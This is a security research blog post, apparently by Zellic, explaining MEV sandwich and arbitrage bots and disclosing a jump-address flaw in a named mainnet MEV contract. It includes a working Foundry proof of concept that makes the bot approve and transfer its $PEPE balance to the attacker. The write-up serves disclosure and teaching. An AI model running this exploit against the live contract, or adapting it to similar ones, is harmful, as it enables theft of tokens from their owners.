pepsipu

July 21, 2023

Your Sandwich Is My Lunch: How to Drain MEV Contracts V2

How Zellic found a bug in a top MEV contract

Introduction

Ethereum is a dark forest↗. Bots listen to incoming transactions on the network and submit their own before the normal user — a process called front-running. Front-running makes bots millions↗ per month in MEV. However, MEV bots are vulnerable to several security issues.

While researching this post, we identified a bug introduced by a gas optimization in one of the largest MEV bots on Ethereum: 0x2387…8CDB↗. It allows us to collect every ERC-20 token the contract owns or is approved to spend.

What Is MEV?

Maximal extractable value (MEV) is a metric of a transaction’s value to bots. For example, a buy transaction for a coin is valuable to holders of that coin, and a sell transaction for a coin a user is borrowing against is valuable to bots that liquidate undercollateralized loans. By becoming a benefitting party, such as a holder of a token or a liquidator of a position, bots can extract value from a transaction. The theoretical limit of the value that bots can get out of a transaction is called MEV.

Sandwiches are a specific type of MEV. By leveraging transactions that buy and sell tokens, bots enter advantageous positions before a user’s transaction gets executed — a process known as front-running. Then, after the transaction executes, the bot immediately exits the position. For example, the bot buys $PEPE, the user buys $PEPE, and then the bot sells $PEPE.

There are more subtle types of MEV too. When a token is mispriced on different markets, such as Uniswap V2 and V3, bots will buy from the cheaper one to sell to the more expensive one. This process is known as arbitrage.
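Both the sandwich and the arbitrage described above reduce to a few swaps against pool reserves. The following is a minimal sketch, assuming every pool is a constant-product pool with a 0.3% fee (the Uniswap V2 pricing formula; Uniswap V3 prices differently). The contract name `MevMath` and its functions are hypothetical and exist only for illustration.

```solidity
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.13;

/// Illustrative only: MevMath and its function names are hypothetical.
contract MevMath {
    /// Constant-product swap output with a 0.3% fee on the input amount.
    function getAmountOut(uint256 amountIn, uint256 reserveIn, uint256 reserveOut)
        public
        pure
        returns (uint256)
    {
        uint256 amountInWithFee = amountIn * 997;
        return (amountInWithFee * reserveOut) / (reserveIn * 1000 + amountInWithFee);
    }

    /// Sandwich: bot buys, user buys, bot sells. Returns the bot's ETH profit
    /// (negative when fees outweigh the price movement caused by the user).
    function sandwichProfit(
        uint256 ethReserve,
        uint256 tokenReserve,
        uint256 botEthIn,
        uint256 userEthIn
    ) external pure returns (int256) {
        // 1. Front-run: the bot buys tokens with ETH.
        uint256 botTokens = getAmountOut(botEthIn, ethReserve, tokenReserve);
        ethReserve += botEthIn;
        tokenReserve -= botTokens;

        // 2. The user buys at the now-worse price, pushing the price up further.
        uint256 userTokens = getAmountOut(userEthIn, ethReserve, tokenReserve);
        ethReserve += userEthIn;
        tokenReserve -= userTokens;

        // 3. Back-run: the bot sells its tokens back into the pool.
        uint256 botEthOut = getAmountOut(botTokens, tokenReserve, ethReserve);
        return int256(botEthOut) - int256(botEthIn);
    }

    /// Arbitrage: buy tokens on pool A, sell them on pool B.
    function arbitrageProfit(
        uint256 ethIn,
        uint256 ethReserveA,
        uint256 tokenReserveA,
        uint256 ethReserveB,
        uint256 tokenReserveB
    ) external pure returns (int256) {
        uint256 tokens = getAmountOut(ethIn, ethReserveA, tokenReserveA);
        uint256 ethOut = getAmountOut(tokens, tokenReserveB, ethReserveB);
        return int256(ethOut) - int256(ethIn);
    }
}
```

A bot would only submit either trade when the returned profit is positive and larger than its gas cost and bribe.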

Liquidations, another form of MEV, are a driving force for arbitrage and sandwiches. When a user’s loan is undercollateralized (the value of the user’s collateral isn’t enough to cover the loan), it is subject to liquidation. Bots liquidate the loan, collecting the borrower’s collateral and selling it on the open market. These price movements form arbitrage and sandwich opportunities.
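As a rough sketch of the undercollateralization test, the check below compares a loan's debt with the discounted value of its collateral. The `thresholdBps` parameter is an assumption: real lending protocols each define their own liquidation threshold and price source, and the contract name is hypothetical.

```solidity
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.13;

/// Illustrative only: not the interface of any real lending protocol.
contract LiquidationCheck {
    /// collateralValue and debtValue must be denominated in the same unit.
    /// thresholdBps is the share of collateral value that may back debt,
    /// in basis points (for example, 8000 means 80%).
    function isLiquidatable(uint256 collateralValue, uint256 debtValue, uint256 thresholdBps)
        external
        pure
        returns (bool)
    {
        return collateralValue * thresholdBps < debtValue * 10_000;
    }
}
```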

These MEV opportunities typically require front-running in one way or another. Front-running is done by bribing a miner to include a bot’s transaction first. This bribe also needs to be larger than the bribes of other bots competing for the same value extraction opportunity. Competition in MEV has caused some bots to forfeit over 99% of the extracted value to the bribe. For a sandwich, the three transactions (the bot’s buy, the user’s transaction, and the bot’s sell) are added to a bundle, an atomic list of transactions sent to miners, which explicitly tells them to either include all three in order or none at all.

Now that we know the principles of MEV, we can explore where bots go wrong in extracting it.

Common MEV Attacks

Salmonella Attacks

Attacking MEV bots isn’t new. The salmonella attack↗ creates poisoned tokens that, when bought, provide a fraction of the tokens the buyer expects to receive. By buying a large sum of this token in the public transaction pool, an attacker can bait bots into sandwiching them. They’ll start by buying the poisoned token before the attacker, but they’ll receive too few tokens to sell.

However, modern bots mitigate this variety of attack with simulations. If sandwiching a transaction doesn’t turn a profit in simulation, they won’t attempt it. Additionally, if the bot’s contract conditionally pays the builder (for example, sends 0.1 ETH to the address returned by the COINBASE instruction if and only if profit is made), transactions that don’t make money aren’t included. For the most part, this prevents them from getting exploited. But if an attacker can find a discrepancy between the simulation and live chain, some bots will pick up their poisoned transactions.
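The conditional payment can be sketched as follows. This is a minimal illustration, assuming profit is measured as the change in the contract's ETH balance; the contract name, the `execute` function, and its parameters are hypothetical and not taken from any real bot.

```solidity
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.13;

/// Illustrative only: pays the block producer if and only if the trade was profitable.
contract ConditionalBribe {
    address private immutable owner;

    constructor() {
        owner = msg.sender;
    }

    receive() external payable {}

    function execute(address target, bytes calldata trade, uint256 bribe) external {
        require(msg.sender == owner, "not owner");

        uint256 balanceBefore = address(this).balance;
        (bool ok, ) = target.call(trade);
        require(ok, "trade failed");

        // Revert the whole transaction unless the trade earned more than the bribe.
        require(address(this).balance > balanceBefore + bribe, "unprofitable");

        // block.coinbase is the address the COINBASE instruction returns.
        (bool paid, ) = block.coinbase.call{value: bribe}("");
        require(paid, "bribe failed");
    }
}
```

Because an unprofitable trade reverts before the payment, the block producer has no incentive to include it.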

Take a look at this tweet↗ by @bertcmiller↗. By checking if the current block is being mined by the Flashbots builder, a malicious token could discriminate between simulation and on chain to conditionally trigger the fractional payout. Profit looks good in simulation, but on chain, it’s a whole other story.

However, it’s reasonable to assume the transaction will fail because, without profit, nobody will bribe the miner for inclusion. No problem — the malicious token pays the miner itself, ensuring the victim’s purchase goes through.

Ommer Attacks

Sometimes, when building the blockchain, two new blocks are created instead of one. Although the blockchain will decide what block to choose with fork choice rules↗, the unincluded block, called the ommer or uncle block, leaks bundles. A bundle included in the ommer will be public to everyone on the blockchain, which allows malicious bots to ruin the atomicity MEV bots expect from their bundles. For example, a bot can pick out only the first buy transaction of another bot’s bundle and sandwich the transaction by including it in a new block.

This has happened many times before. For example, in this post↗ by Elan Halpern, Halpern details trying to find evidence of these uncle bandit attacks occurring. The attacker only made 0.4 ETH — a relatively insignificant sum for MEV attacks — but ommers happen frequently enough to make this a valid money-making strategy.

Modern bots mitigate this attack by only allowing their transactions to succeed in blocks with a specific block ID. If the transaction is included in a block the bot didn’t intend, it’ll fail.
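A minimal sketch of this guard, assuming the "block ID" is the block number the bundle was built for. The contract and parameter names are hypothetical.

```solidity
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.13;

/// Illustrative only: a trade that is valid in exactly one block.
contract PinnedBundle {
    address private immutable owner;

    constructor() {
        owner = msg.sender;
    }

    function execute(uint256 expectedBlock, address target, bytes calldata trade) external {
        require(msg.sender == owner, "not owner");

        // A transaction lifted out of an ommer and replayed in a later block
        // fails here instead of executing without the rest of its bundle.
        require(block.number == expectedBlock, "wrong block");

        (bool ok, ) = target.call(trade);
        require(ok, "trade failed");
    }
}
```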

Gas Optimization Gone Wrong

Many bots rely on smart contracts to extract MEV since they can perform atomic operations and include checks to prevent the aforementioned attacks. However, smart contracts require gas — the currency of computation on Ethereum. So, in order to keep gas costs down, writers of MEV bots attempt to make their contracts as concise and inexpensive as possible. One of these optimizations is in function calling.

Efficient Function Calling?

In Solidity, the typical language used to write smart contracts, calling a function looks a little something like this under the hood:

1. The user gives the program a function hash (the selector). This is the first four bytes of the keccak256 hash of the signature of the function the caller wants to call. For example, if they wanted to call transfer(address,uint256), they’d send the bytes a9059cbb.
2. The program will sequentially compare this hash to the list of public functions it has. Once it’s located a match, it’ll jump to the function.
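The two steps above can be written out by hand. The sketch below is not what the Solidity compiler emits verbatim; it is a hypothetical contract whose fallback function mimics the same sequential comparison, with made-up function signatures `increment()` and `reset()`.

```solidity
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.13;

/// Illustrative only: a hand-written version of selector-based dispatch.
contract ManualDispatch {
    uint256 public counter;

    /// The selector from the example above: the first four bytes of the hash.
    function transferSelector() external pure returns (bytes4) {
        return bytes4(keccak256("transfer(address,uint256)")); // 0xa9059cbb
    }

    fallback() external {
        // msg.sig is the first four bytes of calldata.
        bytes4 selector = msg.sig;

        // Each comparison costs gas, so later entries are more expensive to reach.
        if (selector == bytes4(keccak256("increment()"))) {
            counter += 1;
        } else if (selector == bytes4(keccak256("reset()"))) {
            counter = 0;
        } else {
            revert("unknown selector");
        }
    }
}
```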

However, this is gas hungry. Checking which hashes map to which functions requires several comparisons and extra code. Is there a cheaper option?

Yes. The contract we’ll study, 0x2387…8CDB↗, is a competitive mixed sandwich and arbitrage bot that grosses around $1,000 a day. Its recent rankings on the EigenPhi↗ MEV leaderboards have attracted a lot of attention. How does it save gas?

We’ll need to look at the bytecode↗.

We see that it does a CALLDATALOAD instruction to load the first 256 bits of calldata onto the stack. By running the SHR 0xf0 opcode, which shifts that word right by 240 bits, the contract extracts the first 16 bits from the calldata. Then, *JUMPI will jump to the code offset those bits specify.

In short, the contract reads the calldata we feed it and then jumps to the code address in that data. It doesn’t have a list of functions; it just executes the code at the address we specify. The idea is that Solidity’s function hash comparisons are needlessly complicated. Why not just specify the address of the function in the code and save on gas?
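To see why SHR 0xf0 yields the first 16 bits, the same two instructions can be reproduced in inline assembly. This is a small sketch with a hypothetical contract and function name; it only computes the jump target and does not jump anywhere.

```solidity
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.13;

/// Illustrative only: reproduces the CALLDATALOAD + SHR 0xf0 sequence.
contract JumpTargetDemo {
    function jumpTarget(bytes calldata data) external pure returns (uint256 target) {
        assembly {
            // calldataload reads a 32-byte word starting at the given offset.
            // Shifting right by 0xf0 (240) bits discards the low 240 bits,
            // leaving only the top 16 bits: the first two bytes of data.
            target := shr(0xf0, calldataload(data.offset))
        }
    }
}
```

Calling `jumpTarget` with data that begins with the bytes 03d7 returns 0x03d7, regardless of what follows.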

Here’s a diagram of the two function-calling paradigms:

Although the address jump paradigm looks safe, it opens several issues. There’s no reason we need to specify the start of a function as the address. Why not jump into the middle of a function? Perhaps we could cause the contract to invoke a routine reserved for the owner of the contract by jumping past the authentication checks? All we need is a JUMPDEST instruction where we want to jump.

Sure enough, perusing through the bytecode, there’s a handy code segment that can be used to call any contract, authentication checks omitted:

There are three main segments to this bytecode. Recall that the first 16 bits of the calldata are being used to specify the code address. The first segment copies the calldata supplied by the caller into memory using CALLDATACOPY. The second-to-last segment loads the Ethereum address to call from the caller’s calldata, starting at index CALLDATASIZE - 0x16. The final segment does the actual arbitrary call.
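The calldata layout this gadget expects can be sketched as a decoder. The layout here is an assumption inferred from how the exploit later in this post packs its calldata (a 2-byte jump target, then the inner calldata, then a 20-byte address), not a transcription of the bytecode. The contract and function names are hypothetical.

```solidity
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.13;

/// Illustrative only: splits calldata laid out as
/// [2-byte jump target][inner calldata][20-byte address to call].
contract JumpCalldataLayout {
    function split(bytes calldata data)
        external
        pure
        returns (uint16 jumpTarget, bytes memory innerCalldata, address callee)
    {
        require(data.length >= 22, "too short");

        // First 16 bits: the code offset to jump to.
        jumpTarget = uint16(bytes2(data[:2]));

        // Middle: forwarded unchanged as the calldata of the arbitrary call.
        innerCalldata = data[2:data.length - 20];

        // Last 20 bytes: the address that receives the call.
        callee = address(bytes20(data[data.length - 20:]));
    }
}
```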

The upshot is that we can call an arbitrary address with arbitrary calldata. This is a powerful primitive. What could we use it for?

The contract is holding on to $14 of $PEPE tokens. We can initiate an ERC-20 approval to transfer the tokens from the contract to our wallet.

To simulate this attack, we’ll be using Foundry↗. It’ll let us fork mainnet to verify this attack actually works. We can create a Solidity contract that interfaces with both the $PEPE token and the target contract. Let’s start with this boilerplate:

// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.13;

import "forge-std/Test.sol";
// erc20
import {ERC20} from "openzeppelin-contracts/token/ERC20/ERC20.sol";

contract PEPEThief is Test {
    // define pepe erc20 contract
    ERC20 pepe = ERC20(0x6982508145454Ce325dDbE47a25d4ec3d2311933);
    // the MEV contract under study
    address mev = address(0x23873a6B44CF6836129a0d2BFe6f76d57cAc8CDB);
    // this test contract acts as the attacker's wallet
    address owner = address(this);

    function setUp() public {
        // fork mainnet so the test runs against real contract state
        uint256 forkId = vm.createFork("<your eth node here>");
        vm.selectFork(forkId);
    }

    function testWithdraw() public {
        // your exploit here
    }
}

Foundry allows us to quickly test our exploit by running forge test. This will run all public functions whose names start with test, including testWithdraw.

Using what we know about the bytecode, we can write a function that builds our calldata from three parts: the code segment we’d like to call, 03D7; the calldata we want to send (an approval for withdrawing all $PEPE to the attacker’s wallet); and the address we’d like to call, the $PEPE ERC-20 contract. Let’s call the function approveTransfer.

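function approveTransfer(uint256 balance) private {
    // arguments of the inner call: approve(owner, balance)
    bytes memory calldat = abi.encode(owner, balance);
    bytes4 selector = bytes4(keccak256(bytes("approve(address,uint256)")));
    // layout: 2-byte jump target | inner calldata | 20-byte address to call
    bytes memory data = abi.encodePacked(uint16(0x03d7), selector, calldat, pepe);
    // copy the target to a local so the assembly block reads a clean address
    address target = mev;
    bool ok;
    assembly {
        // skip the 32-byte length prefix of data; its length is mload(data)
        ok := call(gas(), target, 0, add(data, 32), mload(data), 0x0, 0x0)
    }
    require(ok, "call to MEV contract failed");
}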

Here, we create calldat, a variable that holds the ABI-encoded arguments of our call to the pepe address. The other part of that calldata is selector, which is the first four bytes of the keccak256 hash of the signature of the Solidity function we’d like to call. We use abi.encodePacked to concatenate and pack our calldata into one final variable for the MEV contract, data. Using some in-line assembly, we can call the contract with data as our calldata.

Let’s use this function in our test case to see the transfer of funds.

function testWithdraw() public {
    console.log("balance owner", pepe.balanceOf(owner));
    console.log("balance mev", pepe.balanceOf(mev));

    console.log("doing transfer");
    uint256 balance = pepe.balanceOf(mev);
    approveTransfer(balance);
    pepe.transferFrom(mev, owner, balance);

    console.log("balance owner", pepe.balanceOf(owner));
    console.log("balance mev", pepe.balanceOf(mev));
}

In the end, you’ll be rewarded with your hard-earned $PEPE:

However, we will not withdraw this (insignificant) sum on mainnet because attacking smart contracts without permission is illegal. We attempted to get in contact with the author of the contract, but as they are anonymous, we were not able to. Meanwhile, the amount of money in the contract is negligible, and we believe the benefit of an educational security example for developers is invaluable.

Conclusion

Writing MEV bots is hard. There are a lot of opportunities to introduce subtle bugs while optimizing contracts for efficiency and gas, such as the “gadget jump” seen here. That’s why having a second pair of eyes when writing for the blockchain is so important.

The best one can do as an ordinary user is install Flashbots Protect↗. MEV bots won’t see transactions in the waiting pool, so they won’t know when to sandwich a user.

About Us

Zellic specializes in securing emerging technologies. Our security researchers have uncovered vulnerabilities in the most valuable targets, from Fortune 500s to DeFi giants.

Developers, founders, and investors trust our security assessments to ship quickly, confidently, and without critical vulnerabilities. With our background in real-world offensive security research, we find what others miss.

Contact us↗ for an audit that’s better than the rest. Real audits, not rubber stamps.
